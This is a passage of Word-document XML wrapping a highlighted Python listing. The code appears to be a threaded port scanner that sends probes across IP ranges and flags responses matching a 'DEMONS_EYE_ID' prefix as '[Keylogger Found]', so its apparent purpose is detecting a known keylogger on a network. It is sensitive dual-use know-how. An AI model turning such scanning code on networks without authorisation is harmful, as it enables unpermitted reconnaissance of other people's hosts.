      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>ENCODING</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">178  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">                            </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s01"/>
        </w:rPr>
        <w:t># Keylogger Found</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">179  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">                            </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t xml:space="preserve">if </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>response</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>len</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>DEMONS_EYE_ID</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t xml:space="preserve">)] </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t xml:space="preserve">== </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>DEMONS_EYE_ID</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">180  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">                                </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t xml:space="preserve">keyloggers_found </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t>= True</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">181  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">                                </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t xml:space="preserve">response </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t xml:space="preserve">+= </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s41"/>
        </w:rPr>
        <w:t>' [Keylogger Found]'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">182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8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84  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">                                </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>print</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s41"/>
        </w:rPr>
        <w:t>'Error decoding Base64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85  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">                    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t>else:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">186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7  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">                </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t>else:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">188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9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lastRenderedPageBreak/>
        <w:t xml:space="preserve">190  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">                </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t xml:space="preserve">response </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t xml:space="preserve">= </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s41"/>
        </w:rPr>
        <w:t>'[No Response]'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">191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2  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">                    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>print</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s41"/>
        </w:rPr>
        <w:t xml:space="preserve">'No response : %s ' </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t xml:space="preserve">% </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>e</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">193  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t>finally:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">194  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">                </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>self</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>open_ports</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>append</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s41"/>
        </w:rPr>
        <w:t xml:space="preserve">'Host %s Port %s [Open] %s'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response</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>))</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">195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96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7  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">                </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>print</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s41"/>
        </w:rPr>
        <w:t xml:space="preserve">'Host %s Port %d Exception %s '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e</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>))</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">198  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t>pass</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">199  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t>finally:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">200  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>close</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">201  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">202  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s01"/>
        </w:rPr>
        <w:t># Decrement running threads counter</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">203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204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205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206  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">207  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t xml:space="preserve">def </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>write</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08  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t xml:space="preserve">for </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t xml:space="preserve">op </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t xml:space="preserve">in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>self</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>open_ports</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">209  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>print</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>op</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">210  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">211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12  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>self</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t xml:space="preserve">threads </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t xml:space="preserve">= </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>[]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">21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14  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>print</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s41"/>
        </w:rPr>
        <w:t xml:space="preserve">'Start scan ' </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t xml:space="preserve">+ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>str</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>self</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>ip</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>))</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">215  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s01"/>
        </w:rPr>
        <w:t># Enumerate ports list and scan and add to thread</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">216  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t xml:space="preserve">for </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t xml:space="preserve">port </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t xml:space="preserve">in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>enumerate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>self</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>ports</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">217  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t xml:space="preserve">s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scan</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>args</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>self</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218  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>start</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">219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s</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">220  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">221  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s01"/>
        </w:rPr>
        <w:t># Finish threads before main thread starts again</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">222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23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24  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">225  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s01"/>
        </w:rPr>
        <w:t># Write out the ports that are open</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">226  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>self</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>write</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">227  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">228  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">229  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s01"/>
        </w:rPr>
        <w:t># Scan a range of IPs for open ports</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">230  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s01"/>
        </w:rPr>
        <w:t># Get CIDR net_gange, List of port_list, message to send, verbosity</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">231  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
